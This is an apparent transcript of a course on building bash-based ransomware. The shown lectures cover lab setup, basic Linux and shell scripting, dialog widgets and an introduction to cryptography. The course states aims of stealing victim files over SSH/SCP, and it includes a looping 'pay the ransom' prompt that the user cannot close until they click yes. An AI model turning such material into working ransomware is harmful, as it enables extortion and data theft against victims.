Hello and welcome to this Udemy course, Bash Scripting for Cybersecurity, Ransomware Development. I am John Ebini Ode, a cybersecurity expert, penetration tester, computer programmer, and security researcher at Crowd. With years of experience in ethical hacking and security research, I am here to guide you through understanding and defending against ransomware. Now, why take this course? In this course, you will learn not only how ransomware works, but also how to build a basic bash-based ransomware and an advanced bash-based ransomware for educational and ethical hacking purposes. By the end of this course, you will be able to understand the fundamentals of bash scripting and encryption techniques, recognize how ransomware operates and how they spread, and also usage of SSH and XCP to steal victim files, and also carrying out a basic social engineering attack. Alright, so important disclaimer, this course is strictly for educational purposes only. Creating or deploying malicious software for illegal use is a crime. The purpose of this course is to educate cybersecurity professionals like you on how to defend against such attacks. Now, if you are excited to dive in, let's get started. Welcome. Before we start writing our bash ransomware, it is crucial to set up a safe lab environment. We will be working with encryption script, so we don't want to risk our actual system files. So the tools we need for the virtual machines, we need two virtual machines. And for this course, I am making use of Kali Linux and Linux Mint. But you can also make use of any Linux distribution you want, such as Ubuntu or Parrot operating system. But for this course, I am making use of Kali Linux and Linux Mint. Also, we are going to be making use of the encryption tool known as OpenSSL. And we are also going to be making use of SSH for secure remote login and file transfer. So if you want to use the same virtual machines I am making use of in this video, then you need to learn how to install Kali Linux and Linux Mint. So to do that, for Kali Linux, you have to visit the Kali website here, kali.org. You click on download. Now, if you notice, I am making use of VMware. Now, if you are making use of VirtualBox, you click on what? Virtual machines. If you're making use of VirtualBox, you select this one here, or you select VMware if you are making use of VMware, or if you are making use of Hyper-V, you select this one here. So when you click on any of these, it will start the download. All right, so for Linux Mint, you have to go to Linux Mint, download, then you click on the first link that appears here. Now I am making use of Linux Mint Cinnamon. So you can click on download and your download will start. Alright, so that is how to download the Linux Mint Cinnamon and Kali Linux. Alright, so after downloading these virtual machines and you have them installed on your VirtualBox or your VMware, what you have to do is to check if these tool have the necessary tool we are going to be making use of in this course. And one of those tools is the OpenSSL tool, which we are going to be making use of for encrypting files and also decrypting files. So I'm going to run this. All right, so I have it installed. But before I move on, whenever you install a new virtual machine, you have to update the virtual machine first before installing any software. All right. Okay. Since I have OpenSSL installed, had it been I don't have it installed, what I will do is to install the OpenSSL by running this command over here and supplying my password. All right. All right. So I have it installed. You can see this message here. Open SSL is already the newest version. All right. What about SSH, which we are going to be making use of for secure remote login and file transfer? Let's see if that is also installed. All right. So I have it installed. And in case you don't have this installed, you can also run this command to install the open SSH or this SSH. All right, so this command I just gave you is for Debian Linux distros. Now, your Linux distribution might be different from the ones I am using in this course. So take a look at the screen so that you will know the distribution package manager that is that you're supposed to use with your Linux distribution, because every Linux distribution they have their distribution package manager. So take a look at the screen and see the one that matches your Linux distribution so that you can install these tools and go ahead with the class. All right. Now, what I just did here on this Linux Mint can also be repeated for the Kali Linux. I'm going to unlock it. You can see run the same thing for the Open SSL and the SSH 2. Run the same thing on your Kali Linux, and if you don't have them installed, then install them. All right. Okay, so for this, I think we are all set. Now, one more thing, we are going to be making use of the Nano editor for writing our bash ransomware. So if you know you don't have the Nano command line editor installed, you can do that by running sudo apt install nano. Now again, the command for your own Linux distribution might be different, so you have to follow your Linux distribution package manager for you to be able to install this for your Linux distribution. Right, so now that we have our environment ready, let's move on to refresh our memory by playing with some Linux command. See you in the next video. Hello, welcome back. And in this video, we are going to be playing around with some Linux command. And there are two things we are going to be doing in this video. Number one, we are going to be navigating the Linux file system. And number two, we are going to be listing files and directories in the Linux system. All right. So to navigate the Linux file system, we can make use of the cd command, which stands for change directory. Now, this command helps you to move from one directory or folder to another. The cd command can be used in two ways. Number one, absolute directory reference and relative directory reference. Now, in absolute directory reference, you reference the specific directory starting from the root directory. Now, it represents the full path of the directory you are trying to go into. Hence, when using the absolute directory reference, you have to type the complete path of the directory. For instance, let's say you are in the home directory and you want to move into the Apache 2 directory, which is present in the etc directory. Now, to do that, I'm going to start up my terminal. All right. So just like I said, I repeat again. For instance, let's say we are in the home directory, which is here. We're in the home directory. I can use this command to check. We're in the home directory here, right? And we want to move into the Apache 2 directory present in the etc directory. So I'm going to use etc. All right. So we are now present in this directory here. We can confirm that. You see, we have changed directory from the home directory to the /etc/apache2 directory. All right. Okay. So this is what we call absolute directory reference, because we started our search from the root directory. Now, the root directory is the starting point of every Linux file system. This is the entry point into the Linux file system. All right. Okay. So now, for relative directory reference, you specify the directory you want to work with relative to your current working directory. Now, in relative directory reference, the directory you want to navigate into is present in the current working directory. Hence, think of this directory as a subdirectory inside your current working directory. Now, the difference between a relative directory reference and an absolute directory reference is this. Relative directory reference does not start with a forward slash. It doesn't start with what? A forward slash. All right, so let's do some example here. So I'm going to go back to my home directory. For example, let's say we are in the home directory where we are right now. This is the home directory, and we want to move into the downloads subdirectory. We can use the command cd downloads. All right. So why didn't I use the forward slash just like I did with the etc Apache 2 directory? Why? Because we are working with relative directory reference, and from the definition I gave, the directory we are trying to navigate into is a subdirectory inside the present working directory. And if you check here, you see that this is the home directory, right? And this downloads directory is under the home directory. So we don't have to make use of what? The forward slash. All right. Okay, so now we have what to call the single dot and the double dot. The single dot represents the current directory, which is this directory we are currently in, and the double dot represents the parent directory. Now I'm going to show you the use cases for this double dot here. All right, so take for instance, since we are present in the home directory and inside the downloads directory, which means the downloads directory is a subdirectory under this our home directory here, right? Okay, so let me show you this. Remember, we are inside here right now. We are inside downloads. What if I want to navigate into this desktop directory here? Yeah, okay, so let's try that. cd desktop. Wow. See the no such file or directory in what? Sorry, no such file or directory called desktop. Do you know why? Because we don't have this desktop directory present in this downloads directory. So what are we going to do now? Remember a few seconds ago, I told you about the single dot, which represent the current directory, and the double dot, which represents the parent directory. Now, the parent directory of download is what? Home/Kali, right? And the desktop directory which we are trying to navigate into is present in that home directory. So what we have to do is to make use of that double dot. Now this double dot here stands for what? The home directory. So we add a slash here, right? All right, so we are now in the desktop directory. You can confirm. We are now what? In the desktop directory. So this command we use here is the same thing as doing like this, desktop. So the double dot there represent this home directory here. All right, so that is how to navigate to use cd pwd for Linux file system navigation. All right, so the next thing we are going to do now is listing files and directories. Now this is very simple. If you want to list the files and directories present on your Linux system, maybe in a particular directory, because there is nothing in this desktop directory. I don't know if there is anything present here, but we can make use of the ls command to list the content of a directory. We can see it is empty. So let's go back to our home directory. Now let's try to list. Now we see the content of our home directory consisting of directories and files. All right, you can also make use of these parameters or options given to the ls command. Now the I here stands for inode and the L here stands for what? Long listing. All right, so this is the content of our home directory. We have directories and files represented by dash here. A single dash represents files while a D represents directories. All right, so this is what we have here. Okay, so thank you for watching. See you in the next video. Welcome back. And in this video, we are going to be creating a file and also deleting a file, or we are going to be creating files and deleting files, and also we are going to be creating directories and also deleting directories. Now, as a cybersecurity professional or ethical hacker, once in a while or more often, you will find yourself creating files to organize your work. And most especially in this context, which we are trying to build a bash ransomware, we need to know how to create and delete files and directories, because this is what the bash ransomware will be doing. All right, so I'm going to show you some few commands which you can use to create files and also delete files, and also to create directories and delete directories on the Linux system. Number one, to create a file, you can make use of the touch command. First of all, okay, yeah, let's continue. So touch, let's say bash ransom.txt. All right, so this is what a text file which I've created. You can see it here, bash ransom.txt. All right, then you can also, now this bash ransom.txt is empty. Now to give it some content, you can make use of the nano editor. We use it to open this bash ransom.txt, and let's just type something. Hi, I am not empty. All right, I'm going to save this using Ctrl X and Ctrl X. So I'm going to display this using the cat command. All right, so we see that we've successfully created the file bash ransom.txt, and also we gave it some content, right? Okay, so you can also use this cat command to create a file, not only for displaying the content of a file. Now to do that, you can do this using this operator here, and let's call this bash ransom2.txt. all right, so this is going to wait for us to give it some input. So I'm going to say, hi, I am here. All right, then I'm going to use Ctrl D to stop. Now let's display the content of this. You see, it was written successfully. Hi, I am here. Now you can also append to a file instead of overwriting the content of a file. Now to append to a file, I'm going to append to the bash ransom2.txt. So I'm going to say my name is John Ode, right? As usual, Ctrl D, and I'm going to display the content of this file again. You can see I successfully appended this content. My name is John Ode to this bash ransom2.txt file. All right, so that is how to create files using the cat and the touch command. Okay, so you can also create a file by making use of the echo command. All right, so you do it this way: echo, let's say I am teaching bash ransomware development, right? I'm going to use this operator. I'm going to use this operator again. Let's call this info.txt. And I'm going to display it. You can see it was written successfully. So I've shown you 3 ways to create a file using the echo, cat, and the touch command. All right, so now let's go into deleting files. Now to delete a file, you make use of the rm command. So I'm going to delete all these files which we created. So I'm going to first of all remove info.txt. Let's see if it's still existing. Nope, it has been deleted. All right, which other one did we create? Okay, we created these 2 here. Bash ransom2.txt. I'm going to remove that also. Let's see. Yeah, it has been removed. So we are left with this. So I'm also going to remove that. All right, so those files have been successfully deleted. So that is how to delete a file. All right, so right now let's go into creating directories. Now, to create a directory, you can make use of the mkdir command. So I'm going to create a directory called, let's say, bash ransom course. All right, let's see if that was created. Yep, you can see it here, bash run course, right? Then I can navigate into that directory. Right now I'm in the directory, bash what run course. All right, so that is how to create a directory. Now, if you notice, the directory we created is what, empty. Okay, so now to delete a directory, you can make use of the rmdir command. Sorry for that, rmdir command, rmdir bash. Sorry, I have to go out. Let me leave here. Then, all right. So let's see if I can move into that directory again. So you can see no such file or directory. It has been successfully what, removed. Now, if you noticed, this rmdir command can only remove empty directories. It cannot remove a directory that has some files or subdirectories inside. So let me show you what I mean. Now I'm going to create bash, let's just say bash run course, right? Then I'm going to cd into this. Then I'm going to create a file, let's say jj.test, right? So now you can see that this directory has a content jj.test. Now let's try to go back to the home directory and remove this directory using this command. You see, failed to remove, bash rc is not empty. So for you to be able to remove this directory and the content of the directory, you make use of rm hyphen r bash rc, right? So let's see, we don't have it here again. You can see confirm. So it has been what, successfully removed. So that is how to remove an empty directory and also a directory that is not empty. Okay, so in the next video, we are going to be learning about cryptography, where you'll be able to learn how to encrypt and decrypt files using the OpenSSL command. All right, so see you in the next video. Hello and welcome. In this video, you are going to learn how to create and run Linux shell script. Now, as a cybersecurity professional or ethical hacker, it is compulsory for you to know how to write simple shell scripts to automate some difficult tasks. Now, in this case, we are building a basic and advanced bash-based ransomware. So you need to learn how to create and run Linux shell script. Now, I'm not going to give you advanced training on Linux shell scripting, just the basic, so that you are going to understand how to build the basic bash ransomware and also the advanced bash based ransomware. All right, so I'm going to start up my terminal here. Now, first of all, what I need you to understand is Linux standard file descriptors. Now, Linux has three standard file descriptors. We have the standard in or the standard input, then we have the standard output, and then we have the standard error. Now, these three Linux file descriptors have their values. Standard input has value of 0, standard output has a value of 1, and standard error has a value of 2. Now, the standard input indicates to the shell or to your Linux shell script where it is going to receive input from. All right. Now, take for instance your Linux terminal. Where does it receive input from? That is via your keyboard, right? Now, whatsoever thing you type on your keyboard is what being displayed on the terminal. Now, this is your keyboard is where the terminal receives input from. That means the standard input of your terminal is what, the keyboard. All right. Okay, then for the standard output is the location where the shell sends the result or output of your shell script. Now, the standard output has the value of what, 1. Now, take for instance, if I run this Linux command called date, which displays the current date, right, which is Sunday 30th March 2025. Now, this date command here displays or generates an output, right, which is this. Now, where does it display this output? On your terminal, right? So, for this command, the std out is what? The terminal. So also for the standard error is the location where the Linux shell or your Linux shell script sends its error messages to. All right. So whenever you try to execute a run command like this, you can see command not found. This is what? An error message. So it tells that is the location where your shell sends these error messages is what the standard error, which is represented by the number 2. Sorry, the number 2. All right. So that is the standard error. But by default, the standard error and the standard output, they make use of the terminal to display their error messages. But you can also redirect the location of this standard output and standard error, and even the standard input using output and input redirections operators, like the input and output redirection operators. We have this for the output redirection operator, and then we have this for the input redirection operator. All right. Now, take for instance, if I want to run this command known as, let's say I have grep, right? This command grep, which is used to search for something like John in a name test file. For example, let me create this file for us. Yeah, now you can see I'm using this output what redirection. Yeah, so I'm redirecting the output of this cat that is the content of this cat command. I'm redirecting the content to this name.txt. And if I should hit enter now, you can see I start what typing. Let's say John, Mark, Matthew. All right. Okay, so now the content or the command, this command now, when I executed it, it would inform me to type in the list of names which I want to store in this file here. Then it redirects all these names here into this file. All right. Okay, so what I'm going to do now is this. I'm going to display the name.txt file. Now you can see we have John, Mark, and Matthew, right? So if I should use this grep, something like to look for to see if John exists in this file called name.txt, you see that yes, John what exists. Now this file here is an input into this command grep, here, because we are trying to search for the name John inside this file here, right? Now another way to do this is this. I can do something like this. This is the input what redirection operator is the same thing. So this is what the standard input. So where is this command receiving input from? This what name.txt. So we call that the std. The standard input of this grep John command is what name dot what txt. So because this is where it is receiving the input from on the what terminal. All right. Okay, so let's try something with this cat something name. You can see error unless you provide a name where it's going to redirect its result into. Okay, so that is just how to work with the input and output redirection operators. All right. Okay, so now we are going to start off with creating and running Linux shell script. Now to create Linux shell script, let's create a directory. Let's say Linux shell script. All right. I'm going to cd into this directory. Now let's create, first of all, we're going to create a shell script file or a shell file or a bash file. So I'm going to say nano, let's say tutorial.sh. All right. Now the first thing you need to know is this. Whenever you are creating your a Linux shell script, you need to start with this shebang. All right. And the shell to use is what bash. This is the path to the shell to use, which is what /bin/bash. All right. So let's start by displaying simple commands. Let's say echo hi, my name is John. All right. I'm going to save this and I'm going to exit. Now, if you take a look at this file, you see that it doesn't have the execute permission. That means we can't run this script. Let's try that and see. You can see permission denied. So we need to give this script permission to execute. So make use of the change mode command plus X. Then we run it. So let's check again. Now you see we have the execute permission here. So I'm going to run this now. You can see, hi, my name is John being displayed. All right. Okay. Now you can also go on to modify this thing, the Linux, the content of this shell script. Now let's say I want to print the name. I'm going to create a variable here, John. All right. Let's call this John Ode. Okay. So now I'm going to display the content of that variable called name. Now to display the content of a variable, you can't just point it here like this. Let me show you what this will give you. It's not going to run. It's just going to run, hi, my name is name. All right. So for you to display the content or the value of this variable called name, you need to pass in this dollar operator here. Now this dollar operator means I need the value of this variable called name. So I'm going to run it again and show you. All right, you can see now, hi, my name is John Ode. Okay, so that is how to work with the echo command on your Linux shell script. All right, so another thing we need to do is Linux shell script support conditional statements like if and what if else or if else then. We call them structured command. All right, so take for instance, if I have something like age is equals to 23. All right, now I can run something like this using the if statement. I'll say if age, that is the content of age, if age is what equals to, let's say 23, then echo yes. All right, else echo no. Then we'll close it. Now this is how to write this shell script for this if then else statement, right? If age is equals to what, 23, then echo yes, else echo no. So I'm going to run this and see. All right, you can see yes, because what, the age is 23. All right, so that's how to use the if then else statement. All right, then you can also carry out a test to see if a particular file exists in a directory. Now let's make use of our home directory. Let's say home red hound there's directory. Then let's put the file name here. Let's say file name is equals to something like let's say names.txt, right? So now I can use this if then else statement to check if this file exists. Now to check if a file exists, you make use of this command here, or should I call it option, this -e, which stands for exist. Now if it exists in what, this directory, remember I told you that whenever you want the content of a variable, you use this, you precede it with what, or you use this dollar symbol in the front or at the front of it, right? So what I'm going to do now is I'm going to say if this file exists in this directory, this name.txt file, right? That is what I'm trying to do. So let me clear this and show you. So if this, then file name, right? If it exists, then echo yes, else echo no, right? No. Then I'm going to close this, Ctrl X, Ctrl X. Now let's run the script. You can see no. Why? Let's see if that is correct. Let me navigate to our home directory and see if that file exists. You can see there is no names.txt. We only have what, name.txt. So let me change that so that we can have a positive output. So I'm going to remove this X here, Ctrl X, Ctrl X. Now let's run it again. you can see we now have what? A yes, because the file name.txt exists in that directory. All right. So now another thing we can do is to make use of the what we call for loop and what while loops. Now these for loops and while loops, they repeat a set of commands until a certain condition is met. The for statement is used, or the for statement is used to loops, that is, it loops through commands until what? A certain condition is met. All right. So let's see. Come in. Let me go to that file again. Now we are going to loop through. Let's change this directory, or let's just leave it as our home directory, right? Okay, so I'm going to loop through the files in this my home directory using the for loop. Okay, whenever you want to repeat something until a certain condition is met, you make use of what? The for loop or the while loop. Now for files in this directory, asterisk, you notice something strange here, right? This asterisk means I need all the files. Asterisk here represent all files in what? The home directory, not just a specific file, but all files. So on the Linux, or in the Linux world, the asterisk, maybe if you see an asterisk in the Linux shell script or the command or the terminal, just know that it is what? Denoting everything. That is, it is representing everything in that directory. Okay, so if that is that, we use what? Do. Now, if we want to detect from the files in this directory which ones are files and which ones are directories, so I'm going to say if, remember from the few minutes ago, we talked about the E option here, which stands for exist, to check if a particular file exists, right? So now we are trying to check if these particular files we are trying to access in this directory are what? Files. All right. So if that is that, then echo, let's just say tab, let's say this file is what? A file. I'm coming, let me remove that plural there. Then I'm going to remove it here also, and also here. So file is a file. All right. Then I'm going to else echo file is a directory. All right. Then we are done. Yeah. All right. So just see how the structure of the for loop looks like. It's just like this. This is syntax for, let's just say, for file in something. All right. For file in something, then we have do, then your operations here, then done. So this is similar to this. All right. So this is how the for loop body looks like. Okay. So I'm going to Ctrl S, then Ctrl X. Now let's run that script. Now you can see we are in the home directory. We see that basic bash is a file, desktop is a directory, document is a directory, then nc.sh is a file, you can see. And these answers are very correct. Now you notice something here. We have // here, and that is an error on my part. So I'm going to remove that. I'm going to remove it here. Then let's run it again. All right, so you see now basic bash ransomware is a file, desktop is a directory, and all that. All right, so that is how to work with the for loop. All right, so now the while statement works just like the if then statement and the for loop statement. Now the while loop statement, or the while statement, looks like this. Let me open that file again. Okay, I'm coming. I'm going to remove this. Now the syntax of this while loop looks just like the for loop, right? We have something like this: while condition do, then your commands or operations, then done, right? This looks just like the for loop, all right? So the while statement is just like a mixture of the if then else statement and what the for loop statement. So I'm going to remove this. Now we are going to create a counter here. I'm going to count till we get to a certain number. So we have 1 here, right? So while counter is not equals to what? Let's just say 10. Now you can see that just like I said, the while statement is a combination of the if statement and the for loop. You can see this is how the if statement body looks like. Let me do that for you. If, just like we did, if file, right? If this file exists, you remember, right? So we can see the similarity here with that of this while loop here. So it's just like the combination of the if then else statement and the for loop. Then we can say do echo counter, then counter. Now counter is equals to, now we need to increment this counter variable here. Whenever, let's say we count 1, we want to increment to 2, then from 2 we need to move to 3, then from 3 we need to move to 4, from 4 we need to move to 5, then 6, then 7 till what? 10 or 9, right? Okay, so we need to perform some mathematical calculation here, and to do that use the dollar symbol here and then the counter. So there has to be a space, yes, full space there, plus what? 1. That means we are incrementing by 1. All right, then done. So this is going to count up to what? 9 and not 10. Do you know why? Because we have until counter is not equals to 10. So it's going to count up to 9. So I'm going to save this and Control X. All right, so what I'm going to do now is to run this. Now you see we have 1, 2, 3, 4, 5, 6, 7, 8, 9. So that's how to make use of the while statement. All right. Okay. So now another command which you can use to collect input from users, we have the read command, right? Now the read command, you can use it to receive input from users. Now let me show you a simple example. No. All right. So I'm going to clear this. So now I'm going to do something like, let's say, greetings, is equals to welcome to the bash, let us say to the Linux bash development course, right? Now I'm going to say echo greetings, then read. I'm going to read the name. Now, whenever you are using the read command to collect input from users, you need to specify the variable where the user input will reside, which is this name here. Then I'm going to say echo nice meeting you here. Then name, Ctrl S, Ctrl X. So now I'm going to run this command. You see, welcome to the Linux by development course. I'm going to type my name, John. You see, nice meeting you here, John. All right. Okay, so that is how to receive or to collect input from users making use of the Linux read command. One more thing, you can modify this script to show the user a prompt, because just like we ran the script here, you can see a normal user will not expect that he or she should type or give this Linux shell script an input, but the Linux shell script is waiting for what? An input here. You understand? All right, so we need to display a prompt. So to do that, you make use of the -p option for the read command. So -p, let me say name please. All right, so name please. Then I'm going to Control S. I'm going to save it. Let's run that. You can see name please. Then I can supply John. So nice meeting you here, John. All right. So one more thing you need to know again about this read input, this read command is this. Even though you don't supply a name or a variable here where to store the user input, by default, the read command makes use of this reply variable by default. So you don't have to put that there. So by default, since it makes use of that, you can just come here and put what? Reply. Sorry. Reply. Okay. Now let's run that again. Name please, John. So you can see either way, you can make use of the reply variable, that is the reply default variable, or you can also make use of the your own self-defined name or variable where to store the user's input. Okay, so that is how to carry out Linux shell scripts. If you notice, this is just like between a basic and advanced introduction to Linux shell scripting, and that is because the purpose of this course is to show you how to build basic bash ransomware and also an advanced bash ransomware. And you need to be familiar with some of these Linux concepts, like some of these Linux command and Linux shell scripting knowledge before you can be able to take this course. All right. But I believe the introduction I just gave you now is going to go a long way to make you know how and when or how to create and build your own Linux shell script, and also how to run your own Linux command or create your own Linux shell script. Okay, so thank you, and see you in the next video. Hello and welcome. In this video today, you are going to learn about dialog. Now, do you want to add some graphics to your Linux shell script or to your Linux bash script? Then you can make use of dialogues. Now, these dialogues, they make use of widgets to give your Linux shell script or your Linux bash script some graphics. Now, there is one thing you need to know about these dialogues. These dialogues, they store their output to the standard error descriptor, that is the standard error file descriptor supported on the Linux system. All right, so I talked about this during the Linux shell scripting video, and if you know you have not watched that video, please go back and watch the video. All right, okay, so I'm going to start up my terminal. Now, first of all, if you don't have dialog installed, you can install it by running this command dialog. All right, let's see. Okay, so I have it installed already. Now, these dialogues, they make use of widgets to give your Linux shell script or your Linux bash script some graphics. So I'm going to hit enter and show you some of the widgets. You can see all of them here. We have yes, no, tree view, time box, pause, message box, and the rest. Okay. So for this video, I'm going to teach you how to make use of message box, the yes, no box, sorry, the yes, no widget, the message box widget, and input box widget, also text box widget, sorry, text box widget, and also the menu widget. All right, so let's start off with the message box widget. Right, okay, so what I'm going to do is I'm going to list them out, so that let me just call this dialog widgets. I'm going to list them out so that we follow through. Okay, so I made mention of message box widget, input box, I'm sorry for that. Okay, input box widget, let me spell that right. Okay, input box, and what again? The yes, no, and what again? The text box, and what again? The menu. All right, the menu widget. Okay, so there are other widgets which you can make use of, just like I showed you by running this command dialog. All right, okay. So now if you want to display a message to a user, like an informational message, you can just make use of the message box widget. So first of all, you give it a title. Let's say success, right? Then hyphen hyphen message box. Now the message, let's say you logged in successfully. All right, now the next parameter we are going to give here, or the next thing we are going to do here, is to set the width and height of the widget. So I'm going to use 10, let's say 1045. All right, so I hit the enter. Okay, did I make a mistake here? Let's see. You logged in successfully. Oh, sorry, I forgot to pass a hyphen here, hyphen, hyphen. All right, so success, you logged in successfully. Okay, so I'm going to hit the enter key. All right, okay. Now, one more thing I need to tell you is this: whenever you select or hit the enter key on a dialog widget, now the dialog uses 0 to represent yes. For example, if we have something like OK and cancel, like OK and cancel. When you select OK, the dialog widget uses 0 to represent affirmation, or like you accept something, right? Let's say I'm asking you a question and I say something like, Michael, do you like oranges? And I give you option like yes, no. If you select yes, that means it is 0. If you select no, that means 1. That is the same concept used by dialogues. Now they represent yes with a 0 and no or cancel with a 1. All right. So now that we have OK here, I'm going to hit enter. Now let's use this command here to see the output. Now we have here what? 0. So whenever you select something like yes, proceed, anything positive, the dialog widget uses 0 to represent them. Then whenever you select something like no or cancel, they make use of what? 1. Don't worry, you are going to see that in action. All right. So that's how to display information using the message box widget. The next widget on the list. Okay, so we have input box. Now the input box is used to collect input from users. So let's do that. Same format but different widget name. So let's call this username. Then input box. Let's give it something like enter username. All right. Then the width and then the height. So I'm going to hit enter. Sorry, no, okay, nothing like input box. Sorry for that. This is supposed to be small letter B. All right. So we can see John. Now when I hit OK, now let's check for the return value. Now you can see we got what? 0. Okay, so now let's click on cancel and see what we are going to get. So I don't want to enter my username, so I select on what? Cancel. Now let's check the return value. You can see 1. So just like I was explaining, dialogues, they make use of 0 to represent OK or yes, and then they make use of 1 to represent anything cancel or no. All right, so let's move on. So the next widget on the list, we have the yes no widget. All right, so this is also like a label. All right, so let's see how we can make use of that. Let's say title. Since we are building a ransomware, so let's say let's supply something like ransomware attack. All right, now I'm going to use yes no for the label, then something like your access to your files is restricted. Yeah, let's just put it this way, is restricted. I'm coming. Let me put double quotes here. Now the next thing here, the width and the height, we need to supply it there. So I'm going to hit enter. Now you can see access to your files is restricted. Now either you can say no or yes. I know that this message displayed here does not align with this yes or no, right? So I'm just going to, let me change that. So I'm going to change that. Let's say something like access to your files is restricted. Do you want to pay the ransom? All right, so I'm going to hit enter. Now we see access to your files is restricted. Do you want to pay the ransom? If I say yes, let's check the return value. You can see a 0 there, right? Okay, then if I say no, let's check the return value again. You can see we have what? A 1. So that verifies the concept of dialogue using 0 to store positive answers and 1 to store negative answers. All right. Okay, so now I'm going to show you something. Remember from the beginning of this video, I told you that dialogues or this widget, they make use of the standard error output, which is std which has the number 2 to store their output, right? So if I want to know what the user, let's say if I want to know what the user entered when we executed this input box, where is it coming? Let me, okay, yeah, enter username, or let's do something like enter, let's say enter price. So I'm going to come over here and do something like payment, right? So if I want to know what the user entered, I'm going to use this redirection operator, which means I want to pass the output of this dialog into this file known as price price.txt. All right. Okay. So one thing that, do you know that this will not work, because just like I established that dialog, they make use of the standard error file descriptor to store the output of the, like whenever they finish executing, they use that to store the output, right? And the standards, this Linux standard error file descriptor make use of what? Two. It makes use of two to as the value, right? We have standard input as one, standard input as 0, standard output as 1, then standard error as 2. All right, so we're going to make use of these two. So we are redirecting every output this dialog is supposed to send to the standard error into what this file here. So I'm going to hit enter. Now I'm going to supply something like 44, right? Sorry, 400. Then I'm going to hit OK. Now let's see if that file was created. Yep, we can see it here. Price.what.txt. Now let's display the content of that file. You can see the 400 are supplied, right? So that is how to receive input from a dialog or from the widgets of a dialog. You can see here using the standard error, redirecting the standard error to this file here. Okay, so now since we've done that, let's look at the next widget on the list. Now we have a text box widget here, which you can use to display the content of a file or a directory. All right, so let's make use of that also. So I'm going to give it a title. Let's try to display the content of the /etc/password directory. So let's say content display, right? Then text box. Let's give it a file. Then the width and height. I'm going to hit enter. Now you can see the content of this /etc/password directory, right? I can use the arrow key on my keyboard to move down. Now you can see I'm going down. All right, so this is how to use a text box. Okay, now I'm curious, let's try to do something. Let me see if this is going to work with this price.txt. Let's see if that will work. Let's say price.txt. All right, it display the value, sorry, the content of that price.txt. Okay, so let's also try it with this. Let me see the bash script if there's any content there. All right, gibberish. Let me see the nc.sh. All right. Okay, so that's how to make use of the text box widget to display the content of files. All right. Okay, so the next widget on the list, we have menu. We have menu. Now, whenever you want users to be supplied with a list of options to select from, you make use of menu. So I'm going to title. Let's just say, let's just call it select your best friend name, right? Okay, then menu. Now what I'm going to do here is I'm going to supply, let's say one. I'm going to give you something like let's say, yep, select your best, let me just say BF, best friend name, from the list, right? Okay, so what I'm going to do now is to set the width and then the height, and then how many options I want to be displayed on a screen at a particular point in time. So let me just give it a limit of 5. All right, then I'll start with the number 1 option. Let's say John. Number 2 option, let's say Michael. Number 3 option, let's say Steven. The fourth option, I'm going to say Frank. All right. Okay, so I'm going to hit enter. Now you can see the option, select your best friend name as a title, then select your best friend name as a message, right? So John Michael Steven, and what we have Frank, okay? So you can use the arrow key on your keyboard to move up and down. So if I select something like, let's say Steven, and I hit enter, okay? So let's let's see the returned value. You can see it's 0 because I selected OK. All right, so you can also store the output of this to a file. So I'm going to say, let's say menu.txt or menu selected.txt. All right, so I'm going to hit enter. So let's say I select Steven. Now this is not going to store the letters of Steven. It's going to store the index, like we have here, index 1 for John, index 2 for Michael, index 3 for Steven. So I'm going to select Steven. All right, so let's see the content of that menu.txt. You can see it's a menu selected. So cart menu selected, we have 3 because that was the index of what? Steven. All right, so I think we've exhausted the list. Okay, so that is how to use dialog widget to give your Linux Bash script some graphics. All right, but if you notice, we have been making use of the terminal, the command line to run this widget. So now let's make use of a bash script to run this widget. All right, so I'm going to create, let's say, widget.sh. Let's just call it widget.sh. So I'm going to show you one example with the yes no widget. All right, so let's say I want a user to click on a yes, on the yes button first before the dialog closes. Else, if the user clicks on the no button, the dialog will not close. All right, so I'm going to say true while true do dialog title, let's say something like, let's just make it other payment again. All right, then yes no, let's give it something like, do you want to pay the ransom? All right, okay, then width and height. All right, so now remember I told you about the OK and the cancel button, right? So the OK here represent what? 0, and then cancel, I'm sorry, let me spell that well, and then cancel represent a 1. All right, okay, so now since we don't want the user to close the dialog when the no is clicked, we want the user to click on the yes button before the dialog closes. So I'm going to say if the return value, which is this, if it is equal to what? 0, right? Then echo user wants to pay. All right, but else, let's say else continue. All right, then I'm going to close this, then done. So now what this script will do is this, it will display the yes no widget to the user. Do you want to pay the ransom? If the user says yes, this, I'm coming, let me add a break here, this script will stop running. It will stop running. Else, if the user selects the no or the cancel button, the script will keep on running. So I'm going to put a break here. All right, okay, so I'm going to save this, Control X, then Control X. Now let's give this the execute permission. Now let's run this. You can see if I select no, you see it's not closing. I'm clicking on no, it's not closing. Now immediately I select yes, this is going to close. Yes, you see the user wants to pay. All right, so this is how to use these dialog widgets in your Linux shell scripts. So since you've seen an example, then you can go on and add other examples with your favorite widgets. such as the text box widget, the yes no widget, and the message box widget. All right, so see you in the next lecture. Hello and welcome. So in this video today, we are going to be learning about cryptography. Now, in the digital world, confidentiality and integrity of data is necessary. Confidentiality ensures that unauthorized access to sensitive data is kept at bay. It guarantees that only individuals who are permitted to view the data can access it, whether it is financial records, intellectual property, personal information, or any other kind of sensitive data. This idea is essential to preserving the security and privacy of information. Integrity refers to the concept of ensuring that data remains accurate, consistent, and trustworthy throughout its life cycle. It involves protecting data from unauthorized modification or alteration, whether intentional or accidentally. All right, so in this video, you are going to learn the much you need to know about data confidentiality by carrying out encryption and decryption of files. All right, so let's start. So over here we have definition of cryptography. Cryptography is derived from the Greek words cryptos, which means concealed, hidden, veiled, secret, or mysterious, and graphia, which means writing. So thus, cryptography is the art of secret writing. Now, cryptography is the practice of concealing information by converting plain text or readable format into ciphertext on readable format using a key or encryption scheme. Now, I have this picture over here. This is how encryption and decryption takes place. First of all, you have your plain text and then you apply a cryptographic key or an encryption scheme to this plain text to generate a ciphertext. And when you are decrypting, you apply the same cryptographic key or encryption scheme to the ciphertext to generate your plain text. Right, so here we talk about encryption and decryption. So it was necessary for me to show you this picture so that you have a clear picture or a visual representation of how encryption and decryption takes place. Now, encryption is a practice of concealing or hiding information by converting a plain text into a cipher text using a key, just like we have here. Now, encryption guarantees the confidentiality and integrity of data at rest and in transit or in motion. Although the ideas of cryptography and encryption are closely connected, they have different uses and meanings. Now, let's look at that. Now, cryptography is a broad field of study and practice that encompasses techniques for secure communication, protecting data, and ensuring privacy. It involves various principles, methodologies, algorithms, and protocols to secure information from unauthorized access or alterations. Cryptography includes encryption and decryption of sensitive data, hashing of data, and digital signatures. Hence, encryption is a subset of cryptography. Encryption is used to make sure that only people with permission can read the data. This is what we call confidentiality, and which we have in what the CIA triad. All right, so let's move on. Now we have decryption. Decryption is also a subset of cryptography. 